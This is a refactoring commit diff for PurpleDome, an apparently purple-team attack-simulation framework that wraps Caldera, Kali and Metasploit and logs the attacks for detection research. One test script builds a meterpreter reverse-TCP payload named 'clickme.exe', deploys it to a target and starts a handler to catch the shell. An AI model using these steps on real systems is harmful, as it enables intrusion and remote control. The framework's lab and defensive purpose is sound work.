Merge pull request #10 from avast/refactoring

Refactoring
pull/11/head
Thorsten Sick 3 years ago committed by GitHub
commit 0534104945
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -10,7 +10,7 @@ test: tox.ini
coverage report;
shipit: test
cd doc; make html; cd ..
cd doc; make zip; cd ..
git log --pretty="format: %aD %an: %s" > shipit_log.txt
python3 tools/shipit.py

@ -6,10 +6,6 @@ import json
import datetime
def __get_timestamp__():
return datetime.datetime.now().strftime("%H:%M:%S.%f")
def __mitre_fix_ttp__(ttp):
""" enforce some systematic naming scheme for MITRE TTPs """
@ -18,8 +14,8 @@ def __mitre_fix_ttp__(ttp):
if ttp.startswith("MITRE_"):
return ttp
else:
return "MITRE_" + ttp
return "MITRE_" + ttp
class AttackLog():
@ -33,6 +29,22 @@ class AttackLog():
self.log = []
self.verbosity = verbosity
# TODO. As soon as someone wants custom timestamps, make the format variable
self.datetime_format = "%H:%M:%S.%f"
def __add_to_log__(self, item: dict):
""" internal command to add a item to the log
@param item: data chunk to add
"""
self.log.append(item)
def __get_timestamp__(self):
""" Get the timestamp to add to the log entries. Currently not configurable """
return datetime.datetime.now().strftime(self.datetime_format)
def start_caldera_attack(self, source, paw, group, ability_id, ttp=None, name=None, description=None, obfuscator="default", jitter="default"): # pylint: disable=too-many-arguments
""" Mark the start of a caldera attack
@ -47,7 +59,7 @@ class AttackLog():
@param jitter: Jitter being used
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "caldera",
@ -62,7 +74,7 @@ class AttackLog():
"jitter": jitter
}
self.log.append(data)
self.__add_to_log__(data)
# TODO: Add parameter
# TODO: Add config
@ -82,7 +94,7 @@ class AttackLog():
@param jitter: Jitter being used
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "caldera",
@ -96,18 +108,17 @@ class AttackLog():
"obfuscator": obfuscator,
"jitter": jitter
}
self.log.append(data)
self.__add_to_log__(data)
def start_file_write(self, source, target, file_name, ttp=None):
def start_file_write(self, source, target, file_name):
""" Mark the start of a file being written to the target (payload !)
@param source: source of the attack. Attack IP (empty if written from controller)
@param target: Target machine of the attack
@param file_name: Name of the file being written
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "dropping_file",
"sub-type": "by PurpleDome",
@ -115,19 +126,18 @@ class AttackLog():
"target": target,
"file_name": file_name
}
self.log.append(data)
self.__add_to_log__(data)
def stop_file_write(self, source, target, file_name, ttp=None):
def stop_file_write(self, source, target, file_name):
""" Mark the stop of a file being written to the target (payload !)
@param source: source of the attack. Attack IP (empty if written from controller)
@param target: Target machine of the attack
@param attack_name: Name of the attack. From plugin
@param file_name: Name of the file being written
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "dropping_file",
"sub-type": "by PurpleDome",
@ -135,18 +145,17 @@ class AttackLog():
"target": target,
"file_name": file_name
}
self.log.append(data)
self.__add_to_log__(data)
def start_execute_payload(self, source, target, command, ttp=None):
def start_execute_payload(self, source, target, command):
""" Mark the start of a payload being executed
@param source: source of the attack. Attack IP (empty if written from controller)
@param target: Target machine of the attack
@param command: Name of the file being written
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "execute_payload",
"sub-type": "by PurpleDome",
@ -154,19 +163,18 @@ class AttackLog():
"target": target,
"command": command
}
self.log.append(data)
self.__add_to_log__(data)
def stop_execute_payload(self, source, target, command, ttp=None):
def stop_execute_payload(self, source, target, command):
""" Mark the stop of a payload being executed
@param source: source of the attack. Attack IP (empty if written from controller)
@param target: Target machine of the attack
@param command: Name of the attack. From plugin
@param file_name: Name of the file being written
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "execute_payload",
"sub-type": "by PurpleDome",
@ -174,7 +182,7 @@ class AttackLog():
"target": target,
"command": command
}
self.log.append(data)
self.__add_to_log__(data)
def start_kali_attack(self, source, target, attack_name, ttp=None):
""" Mark the start of a Kali based attack
@ -185,7 +193,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "kali",
@ -194,7 +202,7 @@ class AttackLog():
"kali_name": attack_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
# TODO: Add parameter
# TODO: Add config
@ -209,7 +217,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "kali",
@ -218,7 +226,7 @@ class AttackLog():
"kali_name": attack_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
def start_metasploit_attack(self, source, target, metasploit_command, ttp=None):
""" Mark the start of a Metasploit based attack
@ -229,7 +237,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "metasploit",
@ -238,7 +246,7 @@ class AttackLog():
"metasploit_command": metasploit_command,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
def stop_metasploit_attack(self, source, target, metasploit_command, ttp=None):
""" Mark the start of a Metasploit based attack
@ -249,7 +257,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "metasploit",
@ -258,7 +266,7 @@ class AttackLog():
"metasploit_command": metasploit_command,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
def start_attack_plugin(self, source, target, plugin_name, ttp=None):
""" Mark the start of an attack plugin
@ -269,7 +277,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "start",
"type": "attack",
"sub-type": "attack_plugin",
@ -278,7 +286,7 @@ class AttackLog():
"plugin_name": plugin_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
# TODO: Add parameter
# TODO: Add config
@ -293,7 +301,7 @@ class AttackLog():
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": __get_timestamp__(),
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "attack",
"sub-type": "attack_plugin",
@ -302,7 +310,7 @@ class AttackLog():
"plugin_name": plugin_name,
"hunting_tag": __mitre_fix_ttp__(ttp),
}
self.log.append(data)
self.__add_to_log__(data)
def write_json(self, filename):
""" Write the json data for this log

@ -6,17 +6,15 @@ import json
import os
import time
from pprint import pprint, pformat
import requests
import simplejson
from app.exceptions import CalderaError
from app.interface_sfx import CommandlineColors
from pprint import pprint, pformat
# TODO: Ability deserves an own class.
# TODO: Support Stealth settings: "plain-text obfuscation","base64 obfuscation","base64jumble obfuscation","caesar cipher obfuscation","base64noPadding obfuscation","steganography obfuscation"
# TODO: Support Jitter (min/max)
# TODO: Support all Caldera agents: "Sandcat (GoLang)","Elasticat (Blue Python/ Elasticsearch)","Manx (Reverse Shell TCP)","Ragdoll (Python/HTML)"
class CalderaControl():
@ -53,7 +51,8 @@ class CalderaControl():
fullurl = self.url + "file/download"
request = requests.get(fullurl, headers=header)
filename = request.headers["FILENAME"] + extension
open(os.path.join(target_dir, filename), "wb").write(request.content)
with open(os.path.join(target_dir, filename), "wb") as fh:
fh.write(request.content)
# print(r.headers)
return filename
@ -223,6 +222,10 @@ class CalderaControl():
# ######### Get by id
def get_source(self, source_name):
""" Retrieves data source and detailed facts
@param: The name of the source
"""
payload = {"index": "sources",
"name": source_name}
@ -345,8 +348,8 @@ class CalderaControl():
facts = []
if parameters is not None:
for k, v in parameters.items():
facts.append({"trait": k, "value": v})
for key, value in parameters.items():
facts.append({"trait": key, "value": value})
payload["facts"] = facts
print(payload)
@ -370,8 +373,8 @@ class CalderaControl():
sources_name = "source_" + name
self.add_sources(sources_name, parameters)
print("Got:")
print(self.get_source("source_name"))
# To verify:
# print(self.get_source(sources_name))
payload = {"index": "operations",
"name": name,
@ -436,8 +439,8 @@ class CalderaControl():
facts = []
if parameters is not None:
for k, v in parameters.items():
facts.append({"trait": k, "value": v})
for key, value in parameters.items():
facts.append({"trait": key, "value": value})
payload["facts"] = facts
print(payload)

@ -7,7 +7,6 @@ import yaml
from app.exceptions import ConfigurationError
# TODO: Add attack scripts (that will be CACAO in the future !) and plugin config
# So the config being read is distributed into several files and they will have different formats (yaml, CACAO)
# Currently it is a single file and YAML only.
# We want to be independent from file structure or number of config files
@ -209,18 +208,18 @@ class ExperimentConfig():
raise ConfigurationError("results missing in configuration")
try:
res = self.raw_config["results"]["loot_dir"]
except KeyError:
raise ConfigurationError("results/loot_dir not properly set in configuration")
except KeyError as error:
raise ConfigurationError("results/loot_dir not properly set in configuration") from error
return res
def kali_conf(self, attack):
def attack_conf(self, attack):
""" Get kali config for a specific kali attack
@param attack: Name of the attack to look up config for
"""
try:
res = self.raw_config["kali_conf"][attack]
res = self.raw_config["attack_conf"][attack]
except KeyError:
res = {}
if res is None:
@ -246,17 +245,17 @@ class ExperimentConfig():
return "4/8"
return res
def get_kali_attacks(self, for_os):
def get_plugin_based_attacks(self, for_os):
""" Get the configured kali attacks to run for a specific OS
@param for_os: The os to query the registered attacks for
"""
if "kali_attacks" not in self.raw_config:
if "plugin_based_attacks" not in self.raw_config:
return []
if for_os not in self.raw_config["kali_attacks"]:
if for_os not in self.raw_config["plugin_based_attacks"]:
return []
res = self.raw_config["kali_attacks"][for_os]
res = self.raw_config["plugin_based_attacks"][for_os]
if res is None:
return []
return res

@ -11,11 +11,11 @@ from datetime import datetime
from app.attack_log import AttackLog
from app.config import ExperimentConfig
from app.interface_sfx import CommandlineColors
from app.exceptions import ServerError
from app.pluginmanager import PluginManager
from caldera_control import CalderaControl
from machine_control import Machine
from app.exceptions import ServerError
from plugins.base.attack import AttackPlugin
from app.pluginmanager import PluginManager
# TODO: Multi threading at least when starting machines
@ -151,18 +151,18 @@ class Experiment():
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Finished Caldera attacks{CommandlineColors.ENDC}", 1)
# Run Kali attacks
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Kali attacks{CommandlineColors.ENDC}", 1)
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running attack plugins{CommandlineColors.ENDC}", 1)
for target_1 in self.targets:
kali_attacks = self.experiment_config.get_kali_attacks(target_1.get_os())
for attack in kali_attacks:
plugin_based_attacks = self.experiment_config.get_plugin_based_attacks(target_1.get_os())
for attack in plugin_based_attacks:
# TODO: Work with snapshots
self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with attack: {attack}", 1)
# self.attacker_1.kali_attack(attack, target_1.get_ip(), self.experiment_config)
self.attack(target_1, attack)
self.attack_logger.vprint(f"Pausing before next attack (config: nap_time): {self.experiment_config.get_nap_time()}", 3)
time.sleep(self.experiment_config.get_nap_time())
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Finished Kali attacks{CommandlineColors.ENDC}", 1)
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Finished attack plugins{CommandlineColors.ENDC}", 1)
# Stop sensor plugins
# Collect data
@ -193,13 +193,11 @@ class Experiment():
@returns: The output of the cmdline attacking tool
"""
# TODO: Extend beyond Kali
for plugin in self.plugin_manager.get_plugins(AttackPlugin, [attack]):
name = plugin.get_name()
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Kali plugin {name}{CommandlineColors.ENDC}", 2)
plugin.process_config(self.experiment_config.kali_conf(plugin.get_config_section_name())) # TODO: De-kalify
plugin.process_config(self.experiment_config.attack_conf(plugin.get_config_section_name()))
plugin.set_attacker_machine(self.attacker_1)
plugin.set_logger(self.attack_logger)
plugin.set_caldera(self.caldera_control)

@ -313,8 +313,6 @@ class Machine():
def get_ip(self):
""" Returns the IP of the main ethernet interface of this machine """
# TODO: Create special code to extract windows IPs
# TODO: Find a smarter way to get the ip
return self.vm_manager.get_ip()

@ -1,30 +1,35 @@
#!/usr/bin/env python3
""" Module to control Metasploit and related tools (MSFVenom) on the attack server """
import time
import socket
import os
import random
import requests
from pymetasploit3.msfrpc import MsfRpcClient
# from app.machinecontrol import Machine
from app.attack_log import AttackLog
from app.interface_sfx import CommandlineColors
import time
import socket
from app.exceptions import MetasploitError, ServerError
import requests
import random
import os
# https://github.com/DanMcInerney/pymetasploit3
class Metasploit():
def __init__(self, password, **kwargs):
""" Metasploit class for basic Metasploit wrapping """
def __init__(self, password, attack_logger, **kwargs):
"""
:param password: password for the msfrpcd
:param attack_logger: The attack logger to use for logging/printing
:param kwargs: Relevant ones: uri, port, server, username
"""
self.password = password
self.attack_logger = attack_logger
self.username = kwargs.get("username", None)
self.kwargs = kwargs
self.client = None
@ -39,7 +44,7 @@ class Metasploit():
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'):
"""
""" Start a metasploit handler and wait for external payload to connect
@:returns: res, which contains "job_id" and "uuid"
"""
@ -125,19 +130,18 @@ class Metasploit():
# Get_ip can also return a network name. Matching a session needs a real ip
name_resolution_worked = True
try:
ip = socket.gethostbyname(target.get_ip())
target_ip = socket.gethostbyname(target.get_ip())
except socket.gaierror:
ip = target.get_ip() # Limp on feature if we can not get a name resolution
target_ip = target.get_ip() # Limp on feature if we can not get a name resolution
name_resolution_worked = False
print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
# TODO: Try to get the ip address from kali system
retries = 100
while retries > 0:
for k, v in self.get_client().sessions.list.items():
if v["session_host"] == ip:
for key, value in self.get_client().sessions.list.items():
if value["session_host"] == target_ip:
# print(f"session list: {self.get_client().sessions.list}")
return k
return key
time.sleep(1)
retries -= 1
@ -178,12 +182,12 @@ class Metasploit():
shell.write(cmd)
time.sleep(delay)
retries = 20
r = ""
shell_result = ""
while retries > 0:
r += shell.read()
shell_result += shell.read()
time.sleep(0.5) # Command needs time to execute
retries -= 1
res.append(r)
res.append(shell_result)
return res
@ -221,6 +225,8 @@ class Metasploit():
class MSFVenom():
""" Class to remote controll payload generator MSFVenom on the attacker machine """
def __init__(self, attacker, target, attack_logger: AttackLog):
"""
@ -346,24 +352,18 @@ class MetasploitInstant(Metasploit):
"""
def __init__(self, password, attack_logger, **kwargs):
"""
:param password: password for the msfrpcd
:param attack_logger: The attack logging
:param kwargs: Relevant ones: uri, port, server, username
"""
super().__init__(password, **kwargs)
self.attack_logger = attack_logger
def parse_ps(self, ps_output):
d = []
""" Parses the data from ps
:param ps_output: Metasploit ps output
:return: A list of dicts
"""
ps_data = []
for line in ps_output.split("\n")[6:]:
pieces = line.split(" ")
cleaned_pieces = []
for p in pieces:
if len(p):
cleaned_pieces.append(p)
for piece in pieces:
if len(piece):
cleaned_pieces.append(piece)
if len(cleaned_pieces) > 2:
rep = {"PID": int(cleaned_pieces[0].strip()),
@ -381,9 +381,9 @@ class MetasploitInstant(Metasploit):
rep["User"] = cleaned_pieces[5].strip()
if len(cleaned_pieces) >= 7:
rep["Path"] = cleaned_pieces[6].strip()
d.append(rep)
ps_data.append(rep)
return d
return ps_data
def filter_ps_results(self, data, user=None, name=None, arch=None):
""" Filter the process lists for certain

@ -1,7 +1,6 @@
#!/usr/bin/env python3
""" Manage plugins """
import straight.plugin
from glob import glob
import os
@ -10,13 +9,15 @@ from plugins.base.attack import AttackPlugin
from plugins.base.machinery import MachineryPlugin
from plugins.base.sensor import SensorPlugin
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
import straight.plugin
from app.interface_sfx import CommandlineColors
# from app.interface_sfx import CommandlineColors
sections = [{"name": "Vulnerabilities",
"subclass": VulnerabilityPlugin},
{"name": "Machinery",
"subclass": MachineryPlugin},
{"name": "Kali",
{"name": "Attack",
"subclass": AttackPlugin},
{"name": "Sensors",
"subclass": SensorPlugin},
@ -79,16 +80,115 @@ class PluginManager():
print(f"Description: {plugin.get_description()}")
print("\t")
def check(self, plugin):
""" Checks a plugin for valid implementation
@returns: A list of issues
"""
issues = []
# Sensors
if issubclass(type(plugin), SensorPlugin):
# essential methods: collect
if plugin.collect.__func__ is SensorPlugin.collect:
report = f"Method 'collect' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
# Attacks
if issubclass(type(plugin), AttackPlugin):
# essential methods: run
if plugin.run.__func__ is AttackPlugin.run:
report = f"Method 'run' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
# Machinery
if issubclass(type(plugin), MachineryPlugin):
# essential methods: get_ip, get_state, up. halt, create, destroy
if plugin.get_state.__func__ is MachineryPlugin.get_state:
report = f"Method 'get_state' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.get_ip.__func__ is MachineryPlugin.get_ip:
report = f"Method 'get_ip' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.up.__func__ is MachineryPlugin.up:
report = f"Method 'up' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.halt.__func__ is MachineryPlugin.halt:
report = f"Method 'halt' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.create.__func__ is MachineryPlugin.create:
report = f"Method 'create' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.destroy.__func__ is MachineryPlugin.destroy:
report = f"Method 'destroy' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
# Vulnerabilities
if issubclass(type(plugin), VulnerabilityPlugin):
# essential methods: start, stop
if plugin.start.__func__ is VulnerabilityPlugin.start:
report = f"Method 'start' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.stop.__func__ is VulnerabilityPlugin.stop:
report = f"Method 'stop' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
return issues
def print_check(self):
""" Iterates through all installed plugins and verifies them """
names = {}
cnames = {}
issues = []
for section in sections:
# print(f'\t\t{section["name"]}')
plugins = self.get_plugins(section["subclass"])
for plugin in plugins:
# print(f"Checking: {plugin.get_name()}")
# Check for duplicate names
name = plugin.get_name()
if name in names:
report = f"Name duplication: {name} is used in {names[name]} and {plugin.plugin_path}"
issues.append(report)
self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_RED}{report}{CommandlineColors.ENDC}", 0)
names[name] = plugin.plugin_path
# Check for duplicate class names
name = type(plugin).__name__
if name in cnames:
report = f"Class name duplication: {name} is used in {cnames[name]} and {plugin.plugin_path}"
issues.append(report)
self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_RED}{report}{CommandlineColors.ENDC}", 0)
cnames[name] = type(plugin)
# Deep checks
results = self.check(plugin)
if len(results) > 0:
for result in results:
print(f"* Issue: {result}")
issues.append(result)
self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_RED}{result}{CommandlineColors.ENDC}", 1)
return issues
# TODO: Add verify command to verify all plugins (or a specific one)
def print_default_config(self, subclass_name, name):
""" Pretty prints the default config for this plugin """
subclass = None
for a in sections:
if a["name"] == subclass_name:
subclass = a["subclass"]
for section in sections:
if section["name"] == subclass_name:
subclass = section["subclass"]
if subclass is None:
print("Use proper subclass. Available subclasses are: ")
"\n- ".join([a for a in sections["name"]])
"\n- ".join(list(sections["name"]))
plugins = self.get_plugins(subclass, [name])
for plugin in plugins:

@ -21,4 +21,8 @@ help:
all: html epub latexpdf text man
# I want to check the pdf into GIT. Copying it here so I will move it with the usb stick (as the build dir is not moved)
cp build/latex/purpledome.pdf .
cp build/latex/purpledome.pdf .
zip: html
cd build; zip -r documentation.zip html/
cp build/documentation.zip .

@ -1,4 +0,0 @@
*****
Usage
*****

@ -6,7 +6,6 @@ import argparse
from app.experimentcontrol import Experiment
# TODO: Add verbose settings: -v to -vvv
# TODO: Name experiments. Name will be written to the log
def explain(args): # pylint: disable=unused-argument

@ -22,7 +22,7 @@ def create_machines(arguments):
attack_logger = AttackLog(arguments.verbose)
target_ = Machine(config["targets"]["target1"], attack_logger)
attacker_1 = Machine(config["attackers"]["attacker"])
attacker_1 = Machine(config["attackers"]["attacker"], attack_logger)
print("Got them")

@ -1,3 +1,6 @@
#!/usr/bin/env python3
""" Command line tool to interact with metasploit running on the attack server """
from app.machinecontrol import Machine
from app.attack_log import AttackLog
from app.metasploit import MSFVenom, Metasploit
@ -6,13 +9,13 @@ from app.metasploit import MSFVenom, Metasploit
# For some local tests
if __name__ == "__main__":
# msfrpcd -S -P password -u user -f
# msfrpcd -S -P PASSWORD -u USER -f
# attacker_ip = "192.168.178.125"
# target_ip = "192.168.178.125"
# Metasploit RPC
password = "password"
user = "user"
PASSWORD = "PASSWORD"
USER = "USER"
attack_logger = AttackLog(2)
attacker = Machine({ # "root": "systems/attacker1",
@ -39,14 +42,14 @@ if __name__ == "__main__":
target.up()
venom = MSFVenom(attacker, target, attack_logger)
payload_type = "linux/x64/meterpreter_reverse_tcp"
print(venom.generate_cmd(payload=payload_type,
architecture="x64",
platform="linux",
# lhost,
format="elf",
outfile="clickme.exe"))
venom.generate_and_deploy(payload=payload_type,
PAYLOAD_TYPE = "linux/x64/meterpreter_reverse_tcp"
print(venom.generate_payload(payload=PAYLOAD_TYPE,
architecture="x64",
platform="linux",
# lhost,
format="elf",
outfile="clickme.exe"))
venom.generate_and_deploy(payload=PAYLOAD_TYPE,
architecture="x64",
platform="linux",
lhost=attacker.get_ip(),
@ -56,8 +59,8 @@ if __name__ == "__main__":
# TODO get meterpreter session
# TODO simple command to test
metasploit = Metasploit(password, attacker=attacker, username=user)
metasploit.start_exploit_stub_for_external_payload(payload=payload_type)
metasploit = Metasploit(PASSWORD, attack_logger=attack_logger, attacker=attacker, username=USER)
metasploit.start_exploit_stub_for_external_payload(payload=PAYLOAD_TYPE)
print(metasploit.meterpreter_execute(["getuid"], 0))
# client = MsfRpcClient('yourpassword', ssl=True)

@ -2,6 +2,8 @@
""" Managing plugins """
import argparse
import sys
from app.pluginmanager import PluginManager
from app.attack_log import AttackLog
@ -10,16 +12,30 @@ def list_plugins(arguments):
""" List plugins """
attack_logger = AttackLog(arguments.verbose)
p = PluginManager(attack_logger)
p.print_list()
plugin_manager = PluginManager(attack_logger)
plugin_manager.print_list()
return 0
def check_plugins(arguments):
""" Check plugins for validity """
attack_logger = AttackLog(arguments.verbose)
plugin_manager = PluginManager(attack_logger)
res = plugin_manager.print_check()
if len(res) == 0:
print("*************************************")
print("Some issues in plugins were found: ")
print("\n".join(res))
return len(res)
def get_default_config(arguments):
""" print default config of a specific plugin """
attack_logger = AttackLog(arguments.verbose)
p = PluginManager(attack_logger)
p.print_default_config(arguments.subclass_name, arguments.plugin_name)
plugin_manager = PluginManager(attack_logger)
plugin_manager.print_default_config(arguments.subclass_name, arguments.plugin_name)
def create_parser():
@ -29,11 +45,15 @@ def create_parser():
main_parser.add_argument('--verbose', '-v', action='count', default=0)
subparsers = main_parser.add_subparsers(help="sub-commands")
# Sub parser for machine creation
# Sub parser for plugin list
parser_list = subparsers.add_parser("list", help="list plugins")
parser_list.set_defaults(func=list_plugins)
# parser_list.add_argument("--configfile", default="experiment.yaml", help="Config file to create from")
# Sub parser for plugin check
parser_list = subparsers.add_parser("check", help="check plugin implementation")
parser_list.set_defaults(func=check_plugins)
parser_default_config = subparsers.add_parser("raw_config", help="print raw default config of the given plugin")
parser_default_config.set_defaults(func=get_default_config)
parser_default_config.add_argument("subclass_name", help="name of the subclass")
@ -49,4 +69,5 @@ if __name__ == "__main__":
args = parser.parse_args()
args.func(args)
exval = args.func(args)
sys.exit(exval)

@ -1,11 +1,11 @@
#!/usr/bin/env python3
""" Base class for Kali plugins """
import os
from plugins.base.plugin_base import BasePlugin
from app.exceptions import PluginError, ConfigurationError
from app.calderacontrol import CalderaControl
# from app.metasploit import MSFVenom, Metasploit
import os
class AttackPlugin(BasePlugin):
@ -50,7 +50,7 @@ class AttackPlugin(BasePlugin):
""" Cleanup afterwards """
pass # pylint: disable=unnecessary-pass
def attacker_run_cmd(self, command, warn=True, disown=False):
def attacker_run_cmd(self, command, disown=False):
""" Execute a command on the attacker
@param command: Command to execute
@ -65,7 +65,7 @@ class AttackPlugin(BasePlugin):
res = self.attacker_machine_plugin.__call_remote_run__(command, disown=disown)
return res
def targets_run_cmd(self, command, warn=True, disown=False):
def targets_run_cmd(self, command, disown=False):
""" Execute a command on the target
@param command: Command to execute
@ -136,7 +136,7 @@ class AttackPlugin(BasePlugin):
"""
raise NotImplementedError
def install(self):
def install(self): # pylint: disable=no-self-use
""" Install and setup requirements for the attack
"""
@ -179,12 +179,12 @@ class AttackPlugin(BasePlugin):
@returns: the machine
"""
for t in self.targets:
if t.get_name() == name:
return t
for target in self.targets:
if target.get_name() == name:
return target
for t in self.targets:
if name in t.get_nicknames():
return t
for target in self.targets:
if name in target.get_nicknames():
return target
raise ConfigurationError(f"No matching machine in experiment config for {name}")

@ -3,11 +3,10 @@
""" Base class for classes to control any kind of machine: vm, bare metal, cloudified """
from enum import Enum
import os
from app.config import MachineConfig
from app.interface_sfx import CommandlineColors
from plugins.base.plugin_base import BasePlugin
import os
class MachineStates(Enum):

@ -7,8 +7,6 @@ import yaml
from app.exceptions import PluginError
import app.exceptions
# TODO: Proper planning and re-building of plugin system. Especially the default config handling should be streamlined. All the plugin types should have a very similar programming interface.
class BasePlugin():
""" Base class for plugins """
@ -43,12 +41,12 @@ class BasePlugin():
""" Set the attack logger for this machine """
self.attack_logger = attack_logger
def process_templates(self):
def process_templates(self): # pylint: disable=no-self-use
""" A method you can optionally implement to transfer your jinja2 templates into the files yo want to send to the target. See 'required_files' """
return
def copy_to_attacker_and_defender(self):
def copy_to_attacker_and_defender(self): # pylint: disable=no-self-use
""" Copy attacker/defender specific files to the machines """
return
@ -73,13 +71,12 @@ class BasePlugin():
self.machine_plugin = machine_plugin
def set_sysconf(self, config):
def set_sysconf(self, config): # pylint:disable=unused-argument
""" Set system config
@param config: A dict with system configuration relevant for all plugins
"""
# TODO: Verify if it works properly. It should wotk thanks to the new design
# self.sysconf["abs_machinepath_internal"] = config["abs_machinepath_internal"]
# self.sysconf["abs_machinepath_external"] = config["abs_machinepath_external"]
self.load_default_config()
@ -107,7 +104,7 @@ class BasePlugin():
""" Get a file from the machine """
self.machine_plugin.get(src, dst) # nosec
def run_cmd(self, command, warn=True, disown=False):
def run_cmd(self, command, disown=False):
""" Execute a command on the vm using the connection
@param command: Command to execute
@ -140,7 +137,7 @@ class BasePlugin():
for i in self.alternative_names:
res.add(i)
if len(res):
if len(res) > 0:
return list(res)
raise NotImplementedError
@ -193,7 +190,7 @@ class BasePlugin():
return self.get_name()
def main_path(self):
def main_path(self): # pylint:disable=no-self-use
""" Returns the main path of the Purple Dome installation """
app_dir = os.path.dirname(app.exceptions.__file__)

@ -20,39 +20,31 @@ class SensorPlugin(BasePlugin):
super().__init__() # pylint:disable=useless-super-delegation
self.debugit = False
def set_sysconf(self, config):
""" Set system config
@param config: A dict with system configuration relevant for all plugins
"""
super().set_sysconf(config)
def prime(self):
def prime(self): # pylint: disable=no-self-use
""" prime sets hard core configs in the target. You can use it to call everything that permanently alters the OS by settings.
If your prime function returns True the machine will be rebooted after prime-ing it. This is very likely what you want. Only use prime if install is not sufficient.
"""
return False
def install(self):
def install(self): # pylint: disable=no-self-use
""" Install the sensor. Executed on the target. Take the sensor from the share and (maybe) copy it to its destination. Do some setup
"""
raise NotImplementedError
return True
def start(self, disown=None):
def start(self, disown=None): # pylint: disable=unused-argument, no-self-use
""" Start the sensor. The connection to the client is disowned here. = Sent to background. This keeps the process running.
@param disown: Send async into background
"""
raise NotImplementedError
return True
def stop(self):
def stop(self): # pylint: disable=no-self-use
""" Stop the sensor """
raise NotImplementedError
return True
def __call_collect__(self, machine_path):
""" Generate the data collect command

@ -1,27 +1,33 @@
#!/usr/bin/env python3
""" A class you can use to add SSH features to you plugin. Useful for vm_controller/machinery classes """
import os.path
import socket
import time
import paramiko
from fabric import Connection
from app.exceptions import NetworkError
from invoke.exceptions import UnexpectedExit
import paramiko
import time
import socket
from app.exceptions import NetworkError
from plugins.base.plugin_base import BasePlugin
class SSHFeatures(BasePlugin):
""" A Mixin class to add SSH features to all kind of VM machinery """
def __init__(self):
self.config = None
super().__init__()
self.c = None
self.connection = None
def get_ip(self):
""" Get the IP of a machine, must be overwritten in the machinery class """
raise NotImplementedError
def connect(self):
""" Connect to a machine """
if self.c:
return self.c
if self.connection is not None:
return self.connection
retries = 10
retry_sleep = 10
@ -31,7 +37,7 @@ class SSHFeatures(BasePlugin):
if self.config.os() == "linux":
uhp = self.get_ip()
self.vprint(f"Connecting to {uhp}", 3)
self.c = Connection(uhp, connect_timeout=timeout)
self.connection = Connection(uhp, connect_timeout=timeout)
if self.config.os() == "windows":
args = {}
@ -43,15 +49,15 @@ class SSHFeatures(BasePlugin):
self.vprint(args, 3)
uhp = self.get_ip()
